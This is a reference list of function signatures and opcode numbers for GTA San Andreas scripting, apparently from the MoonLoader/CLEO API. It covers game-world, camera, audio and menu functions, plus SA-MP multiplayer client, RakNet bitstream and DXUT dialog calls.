vehicleCanBeTargettedByHsMissile(Vehicle car, bool targetable) 08F2
setFreebiesInVehicle(Vehicle car, bool containsGoodies) 08F3
setScriptLimitToGangSize(bool max) 08F4
makePlayerGangDisappear() 08F5
makePlayerGangReappear() 08F6
int textureCRC, int modelCRC = getClothesItem(Player player, int bodypart) 08F7
showUpdateStats(bool display) 08F8
setCoordBlipAppearance(Checkpoint checkpoint, int type) 08FB
setHeathazeEffect(bool enable) 08FD
bool result = isHelpMessageBeingDisplayed() 08FE
bool result = hasObjectBeenDamagedByWeapon(Object object, int type) 08FF
clearObjectLastWeaponDamage(Object object) 0900
setPlayerJumpButton(Player player, bool enable) 0901
int r, int g, int b, int a = getHudColour(int interface) 0904
lockDoor(int door, bool lock) 0905
setObjectMass(Object object, float mass) 0906
float mass = getObjectMass(int int) 0907
setObjectTurnMass(Object object, float turnMass) 0908
float turnMass = getObjectTurnMass(Object object) 0909
setSpecificZoneToTriggerGangWar(GxtString zone) 090C
clearSpecificZonesToTriggerGangWar() 090D
setActiveMenuItem(int panel, int activeRow) 090E
markStreamedScriptAsNoLongerNeeded(int externalScript) 090F
removeStreamedScript(int externalScript) 0910
setMessageFormatting(bool priority, int leftmargin, int maxwidth) 0912
startNewStreamedScript(int externalScript, table args) 0913
setWeatherToAppropriateTypeNow() 0915
winchCanPickObjectUp(Object object, bool enable) 0916
switchAudioZone(GxtString zone, bool enableSound) 0917
setCarEngineOn(Vehicle car, bool on) 0918
setCarLightsOn(Vehicle car, bool lights) 0919
Ped ped = getUserOfClosestMapAttractor(float sphereX, float sphereY, float sphereZ, float radius, Model modelId, string externalScriptNamed) 091C
switchRoadsBackToOriginal(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 091D
switchPedRoadsBackToOriginal(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 091E
int landingGearStatus = getPlaneUndercarriagePosition(int plane) 091F
cameraSetVectorTrack(float pointX, float pointY, float pointZ, float transverseX, float transverseY, float transverseZ, int time, bool smooth) 0920
cameraSetLerpFov(float from, float to, int timelimit, bool smoothTransition) 0922
switchAmbientPlanes(bool enable) 0923
setDarknessEffect(bool enable, int value) 0924
cameraResetNewScriptables() 0925
int value = getNumberOfInstancesOfStreamedScript(int externalScript) 0926
allocateStreamedScriptToRandomPed(int externalScript, Model actorModel, int priority) 0928
allocateStreamedScriptToObject(int externalScript, Model objectModel, int priority, float radius, int type) 0929
int handle = getGroupMember(int group, int member) 092B
float height = getWaterHeightAtCoords(float atX, float atY, bool ignoreWaves) 092E
cameraPersistTrack(bool lock) 092F
cameraPersistPos(bool lock) 0930
cameraPersistFov(bool lock) 0931
bool result = cameraIsVectorMoveRunning() 0933
bool result = cameraIsVectorTrackRunning() 0934
cameraSetVectorMove(float cameraX, float cameraY, float cameraZ, float positionX, float positionY, float positionZ, int time, bool smoothTransition) 0936
drawWindow(float cornerAX, float cornerAY, float cornerBX, float cornerBY, GxtString gxtString, int style) 0937
attachCarToObject(Vehicle car, Object object, float offsetX, float offsetY, float offsetZ, float rotationX, float rotationY, float rotationZ) 0939
setGarageResprayFree(GxtString garage, bool free) 093A
setCharBulletproofVest(Ped ped, bool enable) 093B
setCinemaCamera(bool lock) 093D
setCharFireDamageMultiplier(Ped ped, float multiplier) 093E
setGroupFollowStatus(int group, bool status) 0940
setSearchlightClipIfColliding(Searchlight searchlight, bool flag) 0941
bool result = hasPlayerBoughtItem(int item) 0942
setCameraInFrontOfChar(Ped ped) 0944
int maxArmour = getPlayerMaxArmour(Player player) 0945
setCharUsesUpperbodyDamageAnimsOnly(Ped ped, bool uninterupted) 0946
int spokenPhrase = setCharSayContext(Ped ped, int speech) 0947
addExplosionVariableShake(float atX, float atY, float atZ, int type, float cameraShake) 0948
attachMissionAudioToChar(int id, Ped ped) 0949
updatePickupMoneyPerDay(Pickup pickup, int cash) 094A
GxtString interiorName = getNameOfEntryExitCharUsed(Ped ped) 094B
float coordX, float coordY, float coordZ, int number = getPositionOfEntryExitCharUsed(Ped ped) 094C
bool result = isCharTalking(Ped ped) 094D
disableCharSpeech(Ped ped, bool disable) 094E
enableCharSpeech(Ped ped) 094F
setUpSkip(float posX, float posY, float posZ, float angle) 0950
clearSkip() 0951
preloadBeatTrack(int soundtrack) 0952
int status = getBeatTrackStatus() 0953
playBeatTrack() 0954
stopBeatTrack() 0955
int max = findMaxNumberOfGroupMembers() 0956
vehicleDoesProvideCover(Vehicle car, bool providesCover) 0957
Pickup pickup = createSnapshotPickup(float atX, float atY, float atZ) 0958
Pickup pickup = createHorseshoePickup(float atX, float atY, float atZ) 0959
Pickup pickup = createOysterPickup(float atX, float atY, float atZ) 095A
bool result = hasObjectBeenUprooted(Object object) 095B
addSmokeParticle(float atX, float atY, float atZ, float velocityX, float velocityY, float velocityZ, int r, int g, int b, int a, float size, float factor) 095C
bool result = isCharStuckUnderCar(Ped ped) 095D
controlCarDoor(Vehicle car, int door, int unlatch, float angle) 095E
float angle = getDoorAngleRatio(Vehicle car, int door) 095F
setPlayerDisplayVitalStatsButton(Player player, bool display) 0960
setCharKeepTask(Ped ped, bool keepTasks) 0961
int id = createMenuGrid(GxtString gxtString, int positionX, int positionY, float width, int columns, bool interactive, bool background, int alignment) 0964
bool result = isCharSwimming(Ped ped) 0965
int status = getCharSwimState(Ped ped) 0966
startCharFacialTalk(Ped ped, int time) 0967
stopCharFacialTalk(Ped ped) 0968
bool result = isBigVehicle(Vehicle car) 0969
switchPoliceHelis(bool enable) 096A
storeCarModState() 096B
restoreCarModState() 096C
Model modelId = getCurrentCarMod(Vehicle car, int slot) 096D
bool result = isCarLowRider(Vehicle car) 096E
bool result = isCarStreetRacer(Vehicle car) 096F
forceDeathRestart() 0970
syncWater() 0971
setCharCoordinatesNoOffset(Ped ped, float atX, float atY, float atZ) 0972
bool result = doesScriptFireExist(int fire) 0973
resetStuffUponResurrection() 0974
bool result = isEmergencyServicesVehicle(Vehicle car) 0975
killFxSystemNow(Particle particle) 0976
bool result = isObjectWithinBrainActivationRange(Player player) 0977
int to = copySharedCharDecisionMaker(int from) 0978
reportMissionAudioEventAtPosition(float atX, float atY, float atZ, int event) 097A
reportMissionAudioEventAtObject(int at, int event) 097B
attachMissionAudioToObject(int id, Object object) 097C
int colours = getNumCarColours(Vehicle car) 097D
extinguishFireAtPoint(float atX, float atY, float atZ, float radius) 0980
bool result = hasTrainDerailed(Vehicle train) 0981
setCharForceDieInCar(Ped ped, bool stayInCarWhenDead) 0982
setOnlyCreateGangMembers(bool enable) 0983
Model modelId = getObjectModel(Object object) 0984
setCharUsesCollisionClosestObjectOfType(float sphereX, float sphereY, float sphereZ, float radius, Model modelId, bool solid, int forActor) 0985
clearAllScriptFireFlags() 0986
int blockingCar = getCarBlockingCar(Vehicle car) 0987
int paintjob = getCurrentVehiclePaintjob(Vehicle car) 0988
setHelpMessageBoxSize(int width) 0989
setGunshotSenseRangeForRiot2(float range) 098A
float angle = getCarMovingComponentOffset(Vehicle car) 098D
setNamedEntryExitFlag(GxtString interior, int bitmask, bool flag) 098E
pauseCurrentBeatTrack(bool paused) 0991
setPlayerWeaponsScrollable(Player player, bool scrollable) 0992
markRoadNodeAsDontWander(float atX, float atY, float atZ) 0994
unmarkAllRoadNodesAsDontWander() 0995
setCheckpointHeading(Checkpoint checkpoint, float angle) 0996
setMissionRespectTotal(int respect) 0997
awardPlayerMissionRespect(int respect) 0998
setCarCollision(Vehicle car, bool collision) 099A
changePlaybackToUseAi(Vehicle car) 099B
cameraSetShakeSimulationSimple(int type, float timelimit, float intensity) 099C
bool result = isNightVisionActive() 099D
setCreateRandomCops(bool enable) 099E
taskSetIgnoreWeaponRangeFlag(Ped ped, bool ignore) 099F
taskPickUpSecondObject(Ped ped, Object object, float offsetX, float offsetY, float offsetZ, int bone, int int7, string animation, string file, int time) 09A0
dropSecondObject(Ped ped, bool to) 09A1
removeObjectElegantly(Object object) 09A2
drawCrosshair(bool draw) 09A3
setUpConversationNodeWithSpeech(GxtString question, GxtString answerY, GxtString answerN, int questionWav, int answerYWav, int answerNWav) 09A4
showBlipsOnAllLevels(bool enable) 09A6
setCharDruggedUp(Ped ped, bool druggedUp) 09A7
bool result = isCharHeadMissing(Ped ped) 09A8
int CRC32 = getHashKey(string string) 09A9
setUpConversationEndNodeWithSpeech(GxtString gxtString, int speech) 09AA
randomPassengerSay(int passengers, int audioTable) 09AB
hideAllFrontendBlips(bool hide) 09AC
setPlayerInCarCameraMode(int mode) 09AD
bool result = isCharInAnyTrain(Ped ped) 09AE
setUpSkipAfterMission(float posX, float posY, float posZ, float angle) 09AF
setVehicleIsConsideredByPlayer(Vehicle car, bool accessible) 09B0
Model modelId, int class = getRandomCarModelInMemory(bool unk) 09B2
int doorStatus = getCarDoorLockStatus(Vehicle car) 09B3
setClosestEntryExitFlag(float atX, float atY, float radius, int bitmask, bool flag) 09B4
setCharSignalAfterKill(Ped ped, bool signal) 09B5
setCharWantedByPolice(Ped ped, bool wanted) 09B6
setZoneNoCops(GxtString zone, bool disableCops) 09B7
addBlood(float atX, float atY, float atZ, float offsetX, float offsetY, float offsetZ, int density, int onActor) 09B8
displayCarNames(bool show) 09B9
displayZoneNames(bool show) 09BA
bool result = isCarDoorDamaged(Vehicle car, int door) 09BB
setCharCoordinatesDontWarpGangNoOffset(Ped ped, float atX, float atY, float atZ) 09BC
setMinigameInProgress(bool enable) 09BD
bool result = isMinigameInProgress() 09BE
setForceRandomCarModel(Model modelId) 09BF
Vehicle car = getRandomCarOfTypeInAngledAreaNoSave(float x1, float y1, float x2, float y2, float angle, int int6) 09C0
addNextMessageToPreviousBriefs(bool int1) 09C1
failKillFrenzy() 09C2
bool result = isCopVehicleInArea3dNoSave(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 09C3
setPetrolTankWeakpoint(Vehicle car, bool enabled) 09C4
bool result = isCharUsingMapAttractor(Ped ped) 09C5
setPlayerModel(Player player, Model modelId) 09C7
bool result = areSubtitlesSwitchedOn() 09C8
removeCharFromCarMaintainPosition(Ped ped, Vehicle car) 09C9
setObjectProofs(Object object, bool BP, bool FP, bool EP, bool CP, bool MP) 09CA
bool result = isCarTouchingCar(Vehicle car1, Vehicle car2) 09CB
bool result = doesObjectHaveThisModel(Object object, Model modelId) 09CC
setTrainForcedToSlowDown(Vehicle train, bool forced) 09CF
bool result = isVehicleOnAllWheels(Vehicle car) 09D0
bool result = doesPickupExist(Pickup pickup) 09D1
enableAmbientCrime(bool enable) 09D2
clearWantedLevelInGarage() 09D4
int unk = setCharSayContextImportant(Ped ped, int soundslot, bool flags1, bool flags2, bool flags3) 09D5
setCharSayScript(Ped ped, int sound, bool flags1, bool flags2, bool flags3) 09D6
forceInteriorLightingForPlayer(Player player, bool force) 09D7
useDetonator() 09D9
bool result = isMoneyPickupAtCoords(float atX, float atY, float atZ) 09DA
setMenuColumnWidth(int panel, int column, int width) 09DB
makeRoomInPlayerGangForMissionPeds(int group) 09DD
bool result = isCharGettingInToACar(Ped ped) 09DE
setUpSkipForSpecificVehicle(float posX, float posY, float posZ, float angle, Vehicle car) 09E0
int price = getCarModelValue(Model modelId) 09E1
int generator = createCarGeneratorWithPlate(float atX, float atY, float atZ, float angle, Model modelId, int color1, int color2, bool forceSpawn, int alarm, int doorLock, int minDelay, int maxDelay, string plate) 09E2
bool result = findTrainDirection(Vehicle train) 09E3
setAircraftCarrierSamSite(bool enable) 09E4
drawLightWithRange(float atX, float atY, float atZ, int r, int g, int b, float radius) 09E5
enableBurglaryHouses(bool enable) 09E6
bool result = isPlayerControlOn(Player player) 09E7
int interior = getCharActiveInterior(Ped ped) 09E8
giveNonPlayerCarNitro(Vehicle car) 09E9
playerTakeOffGoggles(Player player, bool useAnim) 09EB
allowFixedCameraCollision(bool allow) 09EC
bool result = hasCharSpottedCharInFront(Ped ped, Ped ped2) 09ED
forceBigMessageAndCounter(bool stayOnScreen) 09EE
setVehicleCameraTweak(Model carModel, float distance, float altitudeMultiplier, float angleX) 09EF
resetVehicleCameraTweak() 09F0
reportMissionAudioEventAtChar(Ped ped, int event) 09F1
bool result = doesDecisionMakerExist(int maker) 09F2
ignoreHeightDifferenceFollowingNodes(Ped ped, bool ignore) 09F4
shutAllCharsUp(bool enable) 09F5
setCharGetOutUpsideDownCar(Ped ped, bool canGetOut) 09F6
reportMissionAudioEventAtCar(Vehicle car, int event) 09F7
doWeaponStuffAtStartOf2pGame() 09F8
bool result = hasGameJustReturnedFromFrontend() 09FA
int language = getCurrentLanguage() 09FB
bool result = isObjectIntersectingWorld(Object object) 09FC
int width = getStringWidth(GxtString gxtString) 09FD
resetVehicleHydraulics(Vehicle car) 09FE
setRespawnPointForDurationOfMission(float posX, float posY, float posZ) 09FF
bool result = isThisModelACar(Model modelId) 0A01
switchOnGroundSearchlight(Searchlight searchlight, bool lightsThroughObstacles) 0A02
bool result = isGangWarFightingGoingOn() 0A03
bool result = isNextStationAllowed(Vehicle train) 0A06
skipToNextAllowedStation(Vehicle train) 0A07
int width = getStringWidthWithNumber(GxtString gxtString, int number) 0A08
shutCharUpForScriptedSpeech(Ped ped, bool muted) 0A09
enableDisabledAttractorsOnObject(Object object, bool enable) 0A0A
loadSceneInDirection(float coordX, float coordY, float coordZ, float angle) 0A0B
bool result = isPlayerUsingJetpack(Player player) 0A0C
clearThisPrintBigNow(int style) 0A0E
bool result = hasLanguageChanged() 0A0F
incrementIntStatNoMessage(int stat, int value) 0A10
setExtraCarColours(Vehicle car, int tertiaryColor, int quaternaryColor) 0A11
int tertiaryColor, int quaternaryColor = getExtraCarColours(Vehicle car) 0A12
manageAllPopulation() 0A13
setNoResprays(bool enable) 0A14
bool result = hasCarBeenResprayed(Vehicle car) 0A15
attachMissionAudioToCar(int audioId, Vehicle car) 0A16
setHasBeenOwnedForCarGenerator(int generator, bool owned) 0A17
setUpConversationNodeWithScriptedSpeech(GxtString questionGXT, GxtString answerYesGXT, GxtString answerNoGXT, int questionWAV, int answerYesWAV, int answerNoWAV) 0A18
setAreaName(GxtString gxtString) 0A19
taskPlayAnimSecondary(Ped ped, string animation, string IFP, float framedelta, bool loopA, bool lockX, bool lockY, bool lockF, int time) 0A1A
bool result = isCharTouchingChar(Ped ped, Ped ped2) 0A1B
disableHeliAudio(Vehicle helicopter, bool disable) 0A1C
taskHandGesture(Ped ped, Ped ped2) 0A1D
takePhoto(bool unk) 0A1E
incrementFloatStatNoMessage(int stat, float value) 0A1F
setPlayerGroupToFollowAlways(Player player, bool followAlways) 0A20
improveCarByCheating(Vehicle car, bool affectedByCheats) 0A21
changeCarColourFromMenu(int panelID, Vehicle car, int colorslot, int activeRow) 0A22
highlightMenuItem(int panel, int row, bool highlight) 0A23
setDisableMilitaryZones(bool disable) 0A24
setCameraPositionUnfixed(float xAngle, float zAngle) 0A25
setRadioToPlayersFavouriteStation() 0A26
setDeathWeaponsPersist(Ped ped, bool persist) 0A27
setCharSwimSpeed(Ped ped, float speed) 0A28
bool result = isPlayerClimbing(Player player) 0A29
bool result = isThisHelpMessageBeingDisplayed(GxtString gxtString) 0A2A
bool result = isWidescreenOnInOptions() 0A2B
drawSubtitlesBeforeFade(bool flag) 0A2C
drawOddjobTitleBeforeFade(bool flag) 0A2D
taskFollowPathNodesToCoordWithRadius(Ped ped, float toX, float toY, float toZ, int mode, int time, float stopRadius) 0A2E
setPhotoCameraEffect(bool firstPersonView) 0A2F
fixCar(Vehicle car) 0A30
setPlayerGroupToFollowNever(Player player, bool neverFollow) 0A31
bool result = isCharAttachedToAnyCar(Ped ped) 0A32
Ped ped = storeCarCharIsAttachedToNoSave(Vehicle car) 0A33
setUpSkipForVehicleFinishedByScript(float posX, float posY, float posZ, float angle, Vehicle car) 0A35
bool result = isSkipWaitingForScriptToFadeIn() 0A36
forceAllVehicleLightsOff(bool off) 0A37
int mode = getPlayerInCarCameraMode() 0A39
bool result = isLastBuildingModelShotByPlayer(Player player, Model modelId) 0A3A
clearLastBuildingModelShotByPlayer(Player player) 0A3B
setUpConversationEndNodeWithScriptedSpeech(GxtString dialogueGxt, int wav) 0A3C
activatePimpCheat(bool enable) 0A3D
Ped ped = getRandomCharInAreaOffsetNoSave(float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ) 0A3E
setScriptCoopGame(bool enable) 0A3F
Marker marker = createUser3dMarker(float atX, float atY, float atZ, int color) 0A40
removeUser3dMarker(Marker marker) 0A41
getRidOfPlayerProstitute() 0A43
displayNonMinigameHelpMessages(bool display) 0A44
setRailtrackResistanceMult(float tracksFriction) 0A45
switchObjectBrains(int externalScript, bool canBeStreamedIn) 0A46
finishSettingUpConversationNoSubtitles() 0A47
allowPauseInWidescreen(bool enable) 0A48
float x, float y = getPcMouseMovement() 0A4A
bool result = isPcUsingJoypad() 0A4B
bool result = isMouseUsingVerticalInversion() 0A4C
bool result = startNewCustomScript(zstring filepath, table args) 0A92
launchCustomMission(zstring filepath, table args) 0A94
int handle = getScmThreadStructNamed(GxtString thread) 0AAA
setCleoSharedVar(int var, int value) 0AB3
int value = getCleoSharedVar(int var) 0AB4
sampSpawnPlayer() 0AF6
uint handle = sampGetBase() 0AF7
sampAddChatMessage(zstring text, uint color) 0AF8
sampSendChat(zstring text) 0AF9
bool result = isSampAvailable() 0AFA
sampRequestClass(int class) 0AFB
sampSendScmEvent(int event, int id, int param1, int param2) 0AFC
sampSetSpecialAction(int action) 0AFD
sampSendDeathByPlayer(int playerId, int reason) 0AFE
bool result, Vehicle car = sampGetCarHandleBySampVehicleId(int id) 0AFF
bool result, Ped ped = sampGetCharHandleBySampPlayerId(int id) 0B20
bool result = sampIsChatInputActive() 0B21
sampSetSendrate(int type, int rate) 0B22
bool result = sampIsPlayerConnected(int id) 0B23
uint structPtr = sampGetPlayerStructPtr(int id) 0B24
int health = sampGetPlayerHealth(int id) 0B25
int armor = sampGetPlayerArmor(int id) 0B26
sampSetGamestate(int gamestate) 0B27
sampDisconnectWithReason(bool timeout) 0B28
sampSetLocalPlayerName(zstring name) 0B29
int ping = sampGetPlayerPing(int id) 0B2A
bool result, int id = sampGetPlayerIdByCharHandle(Ped ped) 0B2B
bool result, int id = sampGetVehicleIdByCarHandle(Vehicle car) 0B2C
bool result, float posX, float posY, float posZ = sampGetStreamedOutPlayerPos(int id) 0B2F
sampSendEnterVehicle(int id, bool passenger) 0B30
sampSendExitVehicle(int id) 0B31
sampSendSpawn() 0B32
sampSendDamageVehicle(Vehicle car, int panel, int doors, int lights, int tires) 0B33
bool result = sampRegisterChatCommand(zstring cmd, function func) 0B34
zstring name = sampGetPlayerNickname(int id) 0B36
uint color = sampGetPlayerColor(int id) 0B37
sampConnectToServer(zstring ip, uint port) 0B38
zstring ip, uint port = sampGetCurrentServerAddress() 0B39
zstring name = sampGetCurrentServerName() 0B3A
sampShowDialog(int id, zstring caption, zstring text, zstring button1, zstring button2, int style) 0B3B
bool result, int button, int list, zstring input = sampHasDialogRespond(int id) 0B3C
Bitstream bs = raknetNewBitStream() 0B3D
raknetDeleteBitStream(Bitstream bs) 0B3E
raknetResetBitStream(Bitstream bs) 0B3F
raknetBitStreamWriteBool(Bitstream bs, bool value) 0B40
raknetBitStreamWriteInt8(Bitstream bs, int value) 0B40
raknetBitStreamWriteInt16(Bitstream bs, int value) 0B40
raknetBitStreamWriteInt32(Bitstream bs, int value) 0B40
raknetBitStreamWriteFloat(Bitstream bs, float value) 0B40
raknetBitStreamWriteBuffer(Bitstream bs, uint dest, uint size) 0B40
raknetBitStreamWriteBitStream(Bitstream bs, Bitstream bitStream) 0B40
raknetBitStreamWriteString(Bitstream bs, string str) 0B40
raknetSendRpcEx(int rpc, Bitstream bs, int priority, int reliability, int channel, bool timestamp) 0B41
raknetSendBitStreamEx(Bitstream bs, int priority, int reliability, int channel) 0B42
int textlabel = sampCreate3dText(zstring text, uint color, float posX, float posY, float posZ, float distance, bool ignoreWalls, int playerId, int vehicleId) 0B44
sampDestroy3dText(int textlabel) 0B45
bool result = sampIs3dTextDefined(int 3dText) 0B46
sampCloseCurrentDialogWithButton(int button) 0B47
int list = sampGetCurrentDialogListItem() 0B48
sampSetCurrentDialogListItem(int list) 0B49
zstring text = sampGetCurrentDialogEditboxText() 0B4A
sampSetCurrentDialogEditboxText(zstring text) 0B4B
bool result = sampIsDialogActive() 0B4C
int type = sampGetCurrentDialogType() 0B4D
int id = sampGetCurrentDialogId() 0B4E
int gamestate = sampGetGamestate() 0B4F
Object object = sampGetObjectHandleBySampId(int id) 0B50
Pickup pickup = sampGetPickupHandleBySampId(int id) 0B51
int objectId = sampGetObjectSampIdByHandle(Object object) 0B52
int pickupId = sampGetPickupSampIdByHandle(Pickup pickup) 0B53
int count = sampGetListboxItemsCount() 0B54
int animid = sampGetPlayerAnimationId(int playerId) 0B57
zstring file, zstring name = sampGetAnimationNameAndFile(int animid) 0B58
int id = sampFindAnimationIdByNameAndFile(zstring name, zstring file) 0B59
int resX, int resY = getScreenResolution() 0B5A
zstring text = sampGetListboxItemText(int item) 0B5B
bool result = sampIsPlayerPaused(int id) 0B5C
sampToggleCursor(bool show) 0B5D
bool result = sampIsLocalPlayerSpawned() 0B61
int action = sampGetPlayerSpecialAction(int id) 0B62
bool result = sampUnregisterChatCommand(zstring cmd) 0B63
bool result = sampIsPlayerNpc(int id) 0B64
int score = sampGetPlayerScore(int id) 0B65
sampSetChatString(int id, zstring text, zstring prefix, uint color, uint pcolor) 0B74
zstring text, zstring prefix, uint color, uint pcolor = sampGetChatString(int id) 0B75
sampSetChatInputText(zstring text) 0B76
zstring text = sampGetChatInputText() 0B77
sampfuncsLog(zstring msg) 0B78
sampSetChatInputEnabled(bool enabled) 0B79
uint rakclientPtr = sampGetRakclientInterface() 0B7A
uint rakpeer = sampGetRakpeer() 0B7B
uint address = sampGetRakclientFuncAddressByIndex(int index) 0B7C
uint callbackAddress = sampGetRpcCallbackByRpcId(int index) 0B7D
uint node = sampGetRpcNodeByRpcId(int index) 0B7E
uint sampPtr = sampGetSampInfoPtr() 0B7F
DxutDialog dialog = dxutCreateDialog(zstring name) 0B80
bool result, int event, int id = dxutPopEvent(DxutDialog dialog) 0B81
dxutAddButton(DxutDialog dialog, int id, zstring text, int posX, int posY, int sizeX, int sizeY) 0B82
dxutAddCheckbox(DxutDialog dialog, int id, zstring text, int posX, int posY, int sizeX, int sizeY) 0B83
dxutSetDialogPos(DxutDialog dialog, int posX, int posY, int sizeX, int sizeY) 0B84
int posX, int posY, int sizeX, int sizeY = dxutGetDialogPosAndSize(DxutDialog dialog) 0B85
dxutSetDialogVisible(DxutDialog dialog, bool visible) 0B86
bool result = dxutIsDialogVisible(DxutDialog dialog) 0B87
dxutAddEditbox(DxutDialog dialog, int id, zstring text, int posX, int posY, int sizeX, int sizeY) 0B88
zstring text = dxutGetControlText(DxutDialog dialog, int id) 0B89
raknetSendRpc(int rpc, Bitstream bs) 0B8A
raknetSendBitStream(Bitstream bs) 0B8B
bool result = sampIsCursorActive() 0B8C
sampSetCursorMode(int mode) 0B8D
int mode = sampGetCursorMode() 0B8E
dxutSetControlVisible(DxutDialog dialog, int id, bool visible) 0B90
dxutAddStatic(DxutDialog dialog, int id, zstring text, int posX, int posY, int sizeX, int sizeY) 0B91
bool result = dxutIsCheckboxChecked(DxutDialog dialog, int id) 0B92
dxutSetDialogBackgroundColor(DxutDialog dialog, uint color) 0B93
dxutSetControlText(DxutDialog dialog, int id, zstring text) 0B94
bool result = dxutControlIsVisible(DxutDialog dialog, int id) 0B95
dxutAddSlider(DxutDialog dialog, int id, int posX, int posY, int sizeX, int sizeY, int max) 0B96
int value = dxutGetSliderValue(DxutDialog dialog, int id) 0B97
dxutSetSliderValue(DxutDialog dialog, int id, int value) 0B98
dxutAddListbox(DxutDialog dialog, int id, int posX, int posY, int sizeX, int sizeY) 0B99
dxutListboxInsertItem(DxutDialog dialog, int id, zstring element, uint data, int after) 0B9A
int element, int count = dxutGetListboxSelectedItemAndCount(DxutDialog dialog, int id) 0B9B
dxutListboxDeleteItem(DxutDialog dialog, int id, int element) 0B9C
zstring text, uint data = dxutGetListboxItemTextAndData(DxutDialog dialog, int id, int element) 0B9D
dxutCheckboxSetChecked(DxutDialog dialog, int id, bool checked) 0B9E
dxutEnableDialogCaption(DxutDialog dialog, bool enable) 0B9F
bool result = dxutIsDialogCaptionEnabled(DxutDialog dialog) 0BA0
dxutSetDialogMinimized(DxutDialog dialog, bool minimized) 0BA1
bool result = dxutIsDialogMinimized(DxutDialog dialog) 0BA2
dxutDeleteControl(DxutDialog dialog, int id) 0BA3
dxutDeleteDialog(DxutDialog dialog) 0BA4
dxutSetFocusOnControl(DxutDialog dialog, int id) 0BA5
dxutSetControlSize(DxutDialog dialog, int id, int sizeX, int sizeY) 0BA6
int sizeX, int sizeY = dxutGetControlSize(DxutDialog dialog, int id) 0BA7
dxutSetControlPos(DxutDialog dialog, int id, int posX, int posY) 0BA8
int posX, int posY = dxutGetControlPos(DxutDialog dialog, int id) 0BA9
dxutSetCheckboxColor(DxutDialog dialog, int id, uint color) 0BAA
bool result = dxutIsDialogExists(DxutDialog dialog) 0BAB
uint settingsPtr = sampGetServerSettingsPtr() 0BAC
uint poolsPtr = sampGetSampPoolsPtr() 0BAD
uint chatPtr = sampGetChatInfoPtr() 0BAE
uint inputPtr = sampGetInputInfoPtr() 0BAF
uint dialogPtr = sampGetDialogInfoPtr() 0BB0
uint kill = sampGetKillInfoPtr() 0BB1
uint miscPtr = sampGetMiscInfoPtr() 0BB2
uint tdpoolPtr = sampGetTextdrawPoolPtr() 0BB3
int objpoolPtr = sampGetObjectPoolPtr() 0BB4
uint gzpoolPtr = sampGetGangzonePoolPtr() 0BB5
uint tlabelpoolPtr = sampGetTextlabelPoolPtr() 0BB6
uint playerpoolPtr = sampGetPlayerPoolPtr() 0BB7
uint vehpoolPtr = sampGetVehiclePoolPtr() 0BB8
uint pickuppoolPtr = sampGetPickupPoolPtr() 0BB9
sampStorePlayerOnfootData(int id, uint dstBuffer) 0BBA
sampStorePlayerIncarData(int id, uint dstBuffer) 0BBB
sampStorePlayerPassengerData(int id, uint dstBuffer) 0BBC
sampStorePlayerTrailerData(int id, uint dstBuffer) 0BBD
sampStorePlayerAimData(int id, uint dstBuffer) 0BBE
sampSendRconCommand(zstring cmd) 0BBF
sampSendOnfootData(uint dataPtr) 0BC0
sampSendIncarData(uint dataPtr) 0BC1
sampSendPassengerData(uint dataPtr) 0BC2
sampSendAimData(uint dataPtr) 0BC3
sampSendBulletData(uint dataPtr) 0BC4
sampSendTrailerData(uint dataPtr) 0BC5
sampSendUnoccupiedData(uint dataPtr) 0BC6
sampSendSpectatorData(uint dataPtr) 0BC7
sampSendClickPlayer(int id, int source) 0BC8
sampSendDialogResponse(int id, int button, int listitem, zstring input) 0BC9
sampSendClickTextdraw(int id) 0BCA
sampSendGiveDamage(int id, float damage, int weapon, int bodypart) 0BCB
sampSendTakeDamage(int id, float damage, int weapon, int bodypart) 0BCC
sampSendEditObject(bool playerObject, int objectId, int response, float posX, float posY, float posZ, float rotX, float rotY, float rotZ) 0BCD
sampSendEditAttachedObject(int response, int index, int model, int bone, float offsetX, float offsetY, float offsetZ, float rotX, float rotY, float rotZ, float scaleX, float scaleY, float scaleZ) 0BCE
sampSendInteriorChange(int id) 0BCF
sampSendRequestSpawn() 0BD0
sampSendPickedUpPickup(int id) 0BD1
sampSendMenuSelectRow(int id) 0BD2
sampSendMenuQuit() 0BD3
sampSendVehicleDestroyed(int id) 0BD4
bool result = sampIsScoreboardOpen() 0BD5
sampToggleScoreboard(bool show) 0BD6
zstring text = sampGetDialogText() 0BD7
zstring caption = sampGetDialogCaption() 0BD8
sampSetDialogClientside(bool clientside) 0BD9
bool result = sampIsDialogClientside() 0BDA
bool result = sampIsChatVisible() 0BDB
int mode = sampGetChatDisplayMode() 0BDC
sampSetChatDisplayMode(int mode) 0BDD
pauseScmThread(uint thread) 0BDE
resumeScmThread(uint thread) 0BDF
bool value = raknetBitStreamReadBool(Bitstream bs) 0BE7
int value = raknetBitStreamReadInt8(Bitstream bs) 0BE7
int value = raknetBitStreamReadInt16(Bitstream bs) 0BE7
int value = raknetBitStreamReadInt32(Bitstream bs) 0BE7
float value = raknetBitStreamReadFloat(Bitstream bs) 0BE7
raknetBitStreamReadBuffer(Bitstream bs, uint dest, uint size) 0BE8
string value = raknetBitStreamReadString(Bitstream bs, uint size) 0BE8
raknetBitStreamResetReadPointer(Bitstream bs) 0BE9
raknetBitStreamResetWritePointer(Bitstream bs) 0BEA
raknetBitStreamIgnoreBits(Bitstream bs, int amount) 0BEB
raknetBitStreamSetWriteOffset(Bitstream bs, int offset) 0BEC
raknetBitStreamSetReadOffset(Bitstream bs, int offset) 0BED
uint value = raknetBitStreamGetNumberOfBitsUsed(Bitstream bs) 0BEE
uint value = raknetBitStreamGetNumberOfBytesUsed(Bitstream bs) 0BEF
uint value = raknetBitStreamGetNumberOfUnreadBits(Bitstream bs) 0BF0
int value = raknetBitStreamGetWriteOffset(Bitstream bs) 0BF1
int value = raknetBitStreamGetReadOffset(Bitstream bs) 0BF2
uint value = raknetBitStreamGetDataPtr(Bitstream bs) 0BF3
zstring string = raknetBitStreamDecodeString(Bitstream bs, int size) 0BF4
raknetBitStreamEncodeString(Bitstream bs, zstring string) 0BF5
raknetEmulRpcReceiveBitStream(int rpc, Bitstream bs) 0BF6
raknetEmulPacketReceiveBitStream(int packet, Bitstream bs) 0BF7
zstring name = raknetGetRpcName(int rpc) 0BF8
zstring name = raknetGetPacketName(int packet) 0BF9
bool result = setSampfuncsGlobalVar(zstring var, int value) 0BFC
